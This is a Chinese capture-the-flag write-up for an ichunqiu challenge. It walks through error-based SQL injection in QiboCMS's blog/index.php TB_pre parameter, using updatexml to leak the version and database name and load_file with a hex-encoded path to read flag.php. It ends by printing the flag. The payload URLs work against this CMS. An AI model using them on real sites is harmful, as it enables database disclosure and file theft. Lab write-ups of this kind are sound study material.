再见CMS

2023-02-17,

观察网站最下方,根据备案号搜到这是个齐博CMS,然后百度就可以搜到齐博CMS漏洞了

然后开始利用

首先尝试了在用户信息修改处进行注入,发现好像想不通了,就在博客界面进行注入

Payload:

获取版本信息

http://2743f65d1ee44b2dbed1eee0a12863d3fa07aa9eccab467e.changame.ichunqiu.com/blog/index.php?file=listbbs&uid=1&id=1&TB_pre=(select%20*%20from%20information_schema.tables%20where%201=2%20or%20(updatexml(1,concat(0x7e,(select%20version()),0x7e),1)))a%23

获取数据库名称

http://2743f65d1ee44b2dbed1eee0a12863d3fa07aa9eccab467e.changame.ichunqiu.com/blog/index.php?file=listbbs&uid=1&id=1&TB_pre=(select%20*%20from%20information_schema.tables%20where%201=2%20or%20(updatexml(1,concat(0x7e,(select%20database()),0x7e),1)))a%23

然后获取表,列,数据信息,发现并没有我们想要的flag,所以说flag不在这里

根据标题提示

flag可能跟之前一样在/var/www/html/flag.php中

然后使用select load_file函数试了试select load_file("/var/www/html/flag.php")和select load_file(‘/var/www/html/flag.php’),发现 ’ 在被提交时会转变成 \’

“ 同样

所以这里不能使用 ’ 与 ” 了,改为16进制

0x2F7661722F7777772F68746D6C2F666C61672E706870

构造payload

http://2743f65d1ee44b2dbed1eee0a12863d3fa07aa9eccab467e.changame.ichunqiu.com/blog/index.php?file=listbbs&uid=1&id=1&TB_pre=(select%20*%20from%20information_schema.tables%20where%201=2%20or%20(updatexml(1,concat(0x7e,(%20select%20mid((select%20load_file(0x2F7661722F7777772F68746D6C2F666C61672E706870)),1,32)%20),0x7e),1)))a%23

通过不断不断更改1的值得到flag

flag{f50c0fa3-e1f3-4a81-8563-6f1f02ed4588}

再见CMS的相关教程结束。

《再见CMS.doc》

下载本文的Word格式文档,以方便收藏与打印。